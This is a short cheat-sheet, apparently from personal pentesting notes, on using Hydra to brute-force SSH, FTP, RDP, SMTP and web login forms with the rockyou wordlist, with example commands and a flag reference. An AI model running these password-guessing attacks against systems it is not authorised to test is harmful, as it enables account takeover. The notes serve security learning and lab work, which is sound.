hydra
Hydra (9.0k ⭐) is a well-known tool to brute force authentication services such as SSH, FTP, RDP, MySQL... It can also be used on login forms, but that's uncommon.
$ wordlist=/usr/share/wordlists/rockyou.txt
# use ssh, ftp...
$ hydra -l username -P $wordlist ssh://IP
$ hydra -l username -P $wordlist ssh://IP:port
$ hydra -l username -P $wordlist ftp://IP
$ hydra -l username -P $wordlist rdp://IP
$ hydra -l xxx@xxx.xxx -P $wordlist smtp://IP
$ [...]
# alternate form
$ hydra -l username -P $wordlist IP ssh -s port
➡️ I use a variable $wordlist to write shorter commands.
You can learn more about wordlists here.
⚠️ If you don't provide a username, hydra will try to find as many working credentials as possible. To stop at the first one, use -f.
- -l username: try this username
- -L file: try a list of usernames
- -p password: try this password
- -P file: try a list of passwords
- -C file: instead of L/P, provide a list of "username:password"
- -s port: use another port
- -t n: use $n$ threads (default: 16) | 4 for services
- -v / -d: verbose / debug
- -V: show login+password for every attempt
- -e [values]: such as -e nsr for all three
  - n: try null password
  - s: try login as pass
  - r: try reversed login
- -f: quit on first log in found
- -u: try all usernames for each password
Special uses
form brute force
Try to brute force the account "toto". ^USER^/^PASS^ are placeholders replaced with the username/password. username=/password= are the names of the form fields. F= is a word in the response that indicates a failure. See also: S=.
$ hydra -l toto -P wordlist IP http-get-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V
$ hydra -l toto -P wordlist IP http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V
👻 To-do 👻
Stuff that I found, but never read/used yet.
- HTTP Basic Auth: [...] IP http-get /